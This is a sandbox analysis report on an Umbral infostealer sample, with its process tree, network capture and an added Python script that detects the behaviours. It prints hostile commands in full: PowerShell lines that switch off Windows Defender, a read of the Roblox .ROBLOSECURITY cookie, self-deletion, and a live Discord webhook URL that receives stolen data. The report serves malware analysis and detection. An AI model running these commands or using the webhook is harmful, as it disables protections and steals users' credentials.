Analysis

  • max time kernel
    138s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    28-11-2024 21:58

General

  • Target

    NursultanRealese.exe

  • Size

    245KB

  • MD5

    cd46141c0f7707d1b4be3187a4c922cd

  • SHA1

    36ff990729059807dd86027fb11a5ba26609588c

  • SHA256

    ec3e59d47b01bb3c53ec23cb06829a302e9c6385a7898460138249de6f0cd4b6

  • SHA512

    61f82d754268476ece6e2b83e71494f32feecee37366542fbfa533a57c8aeb2b8f00ce4bcc30ca4730594eafe0ae8e0aca5660009f6d40a1b05895a4cb385c27

  • SSDEEP

    6144:dloZM+rIkd8g+EtXHkv/iD4ZHPtxd58e1my+Jizq6:/oZtL+EP8R1xznhz

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Uses powershell.exe to run commands.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe
    "C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2892
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe"
      2⤵
      • Views/modifies file attributes
      PID:3640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1132
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4828
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2544
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      PID:4968
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      PID:4600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1352
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:1684
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe" && pause
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      PID:860
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:3556
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0xf4,0x130,0x7ffa1c30cc40,0x7ffa1c30cc4c,0x7ffa1c30cc58
      2⤵
      PID:4556
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1832,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1828 /prefetch:2
      2⤵
      PID:4216
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:3
      2⤵
      PID:2768
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2480 /prefetch:8
      2⤵
      PID:4404
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
      2⤵
      PID:3588
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
      2⤵
      PID:4036
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3752,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
      2⤵
      PID:264
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4784,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:8
      2⤵
      PID:3560
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
      2⤵
      PID:3028
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4928,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:8
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2220
  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
    1⤵
    PID:4192
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
    1⤵
    PID:216
  • C:\Windows\system32\backgroundTaskHost.exe
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
    1⤵
    PID:1352

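The process tree above is the whole stealer playbook in child processes of one dropper: WMIC and PowerShell reads that build a hardware/OS fingerprint, `attrib +h +s` on its own image, two PowerShell calls that carve a Defender exclusion and switch off real-time, IOAV and script scanning plus cloud reporting, a registry read of the Roblox `.ROBLOSECURITY` session cookie, and finally `cmd /c ping localhost && del ...` to delete itself once the upload is done. The following Python is an added example of turning those patterns into process-creation detection logic; it is not code from the sandbox report or from Umbral. The event list is constructed from the tree above (the report shows nesting depth, not parent PIDs, so the ppid values are an assumption), and the rule names, the "three distinct WMI queries" threshold and the root-process grouping are the example's own choices.

```python
"""Process-tree detection for the behaviours in the tree above (Defender
tampering, self-hiding, self-deletion, WMI fingerprinting, Roblox cookie
theft). Added example, not part of the sandbox report or of Umbral."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample modelled on the report's process tree. The report shows
# nesting depth, not parent PIDs, so the ppid values here are an assumption.
SELF = r"C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    ProcEvent(2300, 1, SELF, f'"{SELF}"'),
    ProcEvent(2892, 2300, WMIC, '"wmic.exe" csproduct get uuid'),
    ProcEvent(3640, 2300, r"C:\Windows\SYSTEM32\attrib.exe", f'"attrib.exe" +h +s "{SELF}"'),
    ProcEvent(3940, 2300, PS, '"powershell.exe" Add-MpPreference -ExclusionPath ' + "'" + SELF + "'"),
    ProcEvent(1132, 2300, PS, '"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
              '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true '
              '-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
              '-MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2'),
    ProcEvent(3648, 2300, PS, r'"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY'),
    ProcEvent(2544, 2300, WMIC, '"wmic.exe" os get Caption'),
    ProcEvent(4968, 2300, WMIC, '"wmic.exe" computersystem get totalphysicalmemory'),
    ProcEvent(1684, 2300, WMIC, '"wmic" path win32_VideoController get name'),
    ProcEvent(860, 2300, r"C:\Windows\SYSTEM32\cmd.exe", f'"cmd.exe" /c ping localhost && del /F /A h "{SELF}" && pause'),
    ProcEvent(3992, 1, CHROME, f'"{CHROME}"'),  # benign noise that must not fire
]

DEFENDER_TAMPER = re.compile(
    r"Add-MpPreference\s+-Exclusion|Set-MpPreference\b.*?(-Disable\w+\s+\$true|-MAPSReporting\s+Disabled|-SubmitSamplesConsent)",
    re.I)
HIDE_ATTRIB = re.compile(r"\+h\b.*\+s\b|\+s\b.*\+h\b", re.I)
SELF_DELETE = re.compile(r"\bping\b.*&&.*\bdel\b", re.I)
ROBLOX_COOKIE = re.compile(r"\.ROBLOSECURITY\b", re.I)
WMI_FINGERPRINT = re.compile(r"csproduct get uuid|win32_VideoController|os get Caption|totalphysicalmemory", re.I)


def detect(events):
    """Return (rule, pid) pairs for every event that matches a behaviour."""
    by_pid = {e.pid: e for e in events}
    wmi_queries = defaultdict(set)  # parent pid -> distinct fingerprinting queries
    findings = []
    for e in events:
        image, cmd = e.image.lower(), e.cmdline
        if image.endswith("powershell.exe") and DEFENDER_TAMPER.search(cmd):
            findings.append(("defender_tamper", e.pid))
        if image.endswith("attrib.exe") and HIDE_ATTRIB.search(cmd):
            parent = by_pid.get(e.ppid)
            # Hiding the parent's own image file is the dropper hiding itself.
            rule = "hide_self" if parent and parent.image.lower() in cmd.lower() else "hide_file"
            findings.append((rule, e.pid))
        if image.endswith("cmd.exe") and SELF_DELETE.search(cmd):
            findings.append(("self_delete_via_ping", e.pid))
        if ROBLOX_COOKIE.search(cmd):
            findings.append(("roblox_cookie_theft", e.pid))
        m = WMI_FINGERPRINT.search(cmd) if image.endswith("wmic.exe") else None
        if m:
            wmi_queries[e.ppid].add(m.group(0).lower())
    # One WMI query is routine; three or more distinct hardware/OS queries from
    # the same parent is the HWID + system profile a stealer builds its report from.
    for ppid, queries in wmi_queries.items():
        if len(queries) >= 3:
            findings.append(("hw_fingerprint", ppid))
    return findings


def root_of(pid, by_pid):
    """Walk ppid links up to the top-most process we hold an event for."""
    seen = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def summarize(events):
    """Group rule hits by root process so one dropper yields one alert."""
    by_pid = {e.pid: e for e in events}
    hits = defaultdict(set)
    for rule, pid in detect(events):
        hits[root_of(pid, by_pid)].add(rule)
    return {root: sorted(rules) for root, rules in hits.items()}


if __name__ == "__main__":
    for root, rules in summarize(SAMPLE_EVENTS).items():
        print(f"root pid {root}: {', '.join(rules)}")
```

Grouping by root process matters: each child on its own (a single WMIC call, one `attrib`) is something an installer might legitimately do, but five distinct rules rooted in one unsigned binary in `%TEMP%` is not. Note that the second `.ROBLOSECURITY` read in the tree uses `HKLN:` instead of `HKLM:`, so that PowerShell call fails; the rule still fires on the command line, which is the right outcome for a detection.
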
Network

                              • flag-us
                                DNS
                                gstatic.com
                                NursultanRealese.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                gstatic.com
                                IN A
                                Response
                                gstatic.com
                                IN A
                                142.250.179.227
                              • flag-gb
                                GET
                                https://gstatic.com/generate_204
                                NursultanRealese.exe
                                Remote address:
                                142.250.179.227:443
                                Request
                                GET /generate_204 HTTP/1.1
                                Host: gstatic.com
                                Connection: Keep-Alive
                                Response
                                HTTP/1.1 204 No Content
                                Content-Length: 0
                                Cross-Origin-Resource-Policy: cross-origin
                                Date: Thu, 28 Nov 2024 21:58:33 GMT
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              • flag-us
                                DNS
                                ip-api.com
                                NursultanRealese.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                ip-api.com
                                IN A
                                Response
                                ip-api.com
                                IN A
                                208.95.112.1
                              • flag-us
                                GET
                                http://ip-api.com/line/?fields=hosting
                                NursultanRealese.exe
                                Remote address:
                                208.95.112.1:80
                                Request
                                GET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                Response
                                HTTP/1.1 200 OK
                                Date: Thu, 28 Nov 2024 21:58:33 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 6
                                Access-Control-Allow-Origin: *
                                X-Ttl: 7
                                X-Rl: 43
                              • flag-us
                                DNS
                                58.55.71.13.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                58.55.71.13.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                227.179.250.142.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                227.179.250.142.in-addr.arpa
                                IN PTR
                                Response
                                227.179.250.142.in-addr.arpa
                                IN PTR
                                 lhr25s31-in-f3.1e100.net
                              • flag-us
                                DNS
                                72.32.126.40.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                72.32.126.40.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                95.221.229.192.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                95.221.229.192.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                88.210.23.2.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                88.210.23.2.in-addr.arpa
                                IN PTR
                                Response
                                88.210.23.2.in-addr.arpa
                                IN PTR
                                 a2-23-210-88.deploy.static.akamaitechnologies.com
                              • flag-us
                                DNS
                                1.112.95.208.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                1.112.95.208.in-addr.arpa
                                IN PTR
                                Response
                                1.112.95.208.in-addr.arpa
                                IN PTR
                                 ip-api.com
                              • flag-us
                                DNS
                                www.google.com
                                chrome.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                www.google.com
                                IN A
                                Response
                                www.google.com
                                IN A
                                172.217.16.228
                              • flag-gb
                                GET
                                https://www.google.com/async/ddljson?async=ntp:2
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /async/ddljson?async=ntp:2 HTTP/2.0
                                host: www.google.com
                                sec-fetch-site: none
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                                Response
                                HTTP/2.0 429
                                date: Thu, 28 Nov 2024 21:58:35 GMT
                                pragma: no-cache
                                expires: Fri, 01 Jan 1990 00:00:00 GMT
                                cache-control: no-store, no-cache, must-revalidate
                                content-type: text/html
                                server: HTTP server (unknown)
                                content-length: 3153
                                content-type: text/html
                                content-length: 3153
                              • flag-gb
                                GET
                                https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                host: www.google.com
                                x-client-data: CMnmygE=
                                sec-fetch-site: cross-site
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-gb
                                GET
                                https://www.google.com/async/newtab_promos
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /async/newtab_promos HTTP/2.0
                                host: www.google.com
                                sec-fetch-site: cross-site
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-gb
                                GET
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIrPo7oGIjAlucUIA4wT3cFrxiYaY30ReocY9NWnDLwwQEZs229iU7U4lvc_DD_cRlDn-pF6kJ4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIrPo7oGIjAlucUIA4wT3cFrxiYaY30ReocY9NWnDLwwQEZs229iU7U4lvc_DD_cRlDn-pF6kJ4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                host: www.google.com
                                sec-fetch-site: none
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-gb
                                GET
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIrPo7oGIjDdJWIccIdWYw-DIYE9e3-V9Pz-WYsczSaImjbBJHz_oyqkNBytSdytI8czfyKFVCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIrPo7oGIjDdJWIccIdWYw-DIYE9e3-V9Pz-WYsczSaImjbBJHz_oyqkNBytSdytI8czfyKFVCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                host: www.google.com
                                sec-fetch-site: cross-site
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-gb
                                GET
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGIrPo7oGIjC8gdgq-9tmI7y7Pgy2pPdki6wmQH7Lccg00jC-Oxe_znegoFX__NxQtf8qAK-iZ-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGIrPo7oGIjC8gdgq-9tmI7y7Pgy2pPdki6wmQH7Lccg00jC-Oxe_znegoFX__NxQtf8qAK-iZ-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                host: www.google.com
                                x-client-data: CMnmygE=
                                sec-fetch-site: cross-site
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-us
                                DNS
                                74.204.58.216.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                74.204.58.216.in-addr.arpa
                                IN PTR
                                Response
                                74.204.58.216.in-addr.arpa
                                IN PTR
                                 lhr48s49-in-f10.1e100.net
                                 74.204.58.216.in-addr.arpa
                                 IN PTR
                                 lhr25s13-in-f10.1e100.net
                                 74.204.58.216.in-addr.arpa
                                 IN PTR
                                 lhr25s13-in-f74.1e100.net
                              • flag-us
                                DNS
                                35.200.250.142.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                35.200.250.142.in-addr.arpa
                                IN PTR
                                Response
                                35.200.250.142.in-addr.arpa
                                IN PTR
                                 lhr48s30-in-f3.1e100.net
                              • flag-us
                                DNS
                                228.16.217.172.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                228.16.217.172.in-addr.arpa
                                IN PTR
                                Response
                                228.16.217.172.in-addr.arpa
                                IN PTR
                                 mad08s04-in-f4.1e100.net
                                 228.16.217.172.in-addr.arpa
                                 IN PTR
                                 lhr48s28-in-f4.1e100.net
                              • flag-us
                                GET
                                http://ip-api.com/json/?fields=225545
                                NursultanRealese.exe
                                Remote address:
                                208.95.112.1:80
                                Request
                                GET /json/?fields=225545 HTTP/1.1
                                Host: ip-api.com
                                Response
                                HTTP/1.1 200 OK
                                Date: Thu, 28 Nov 2024 21:58:36 GMT
                                Content-Type: application/json; charset=utf-8
                                Content-Length: 163
                                Access-Control-Allow-Origin: *
                                X-Ttl: 29
                                X-Rl: 43
                              • flag-us
                                DNS
                                discord.com
                                NursultanRealese.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                discord.com
                                IN A
                                Response
                                discord.com
                                IN A
                                162.159.136.232
                                discord.com
                                IN A
                                162.159.135.232
                                discord.com
                                IN A
                                162.159.138.232
                                discord.com
                                IN A
                                162.159.128.233
                                discord.com
                                IN A
                                162.159.137.232
                              • flag-us
                                POST
                                https://discord.com/api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G
                                NursultanRealese.exe
                                Remote address:
                                162.159.136.232:443
                                Request
                                POST /api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G HTTP/1.1
                                Accept: application/json
                                User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                Content-Type: application/json; charset=utf-8
                                Host: discord.com
                                Content-Length: 941
                                Expect: 100-continue
                                Connection: Keep-Alive
                                Response
                                HTTP/1.1 204 No Content
                                Date: Thu, 28 Nov 2024 21:58:38 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: keep-alive
                                Set-Cookie: __dcfduid=ec75da78add311efb31326ed731c1150; Expires=Tue, 27-Nov-2029 21:58:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                x-ratelimit-limit: 5
                                x-ratelimit-remaining: 4
                                x-ratelimit-reset: 1732831118
                                x-ratelimit-reset-after: 1
                                via: 1.1 google
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MeMpVrVclk5%2BCZ7TTRdwalSwn796GmtPwj4p8Hkj5bYx%2FyAISDnstTociJMRxEcMLq1OC6Hi6zfpkuqNiyzldEDhRvayKmvse%2F00RVJgwEx4kpTpH4eSZG9Q%2FG66"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                X-Content-Type-Options: nosniff
                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
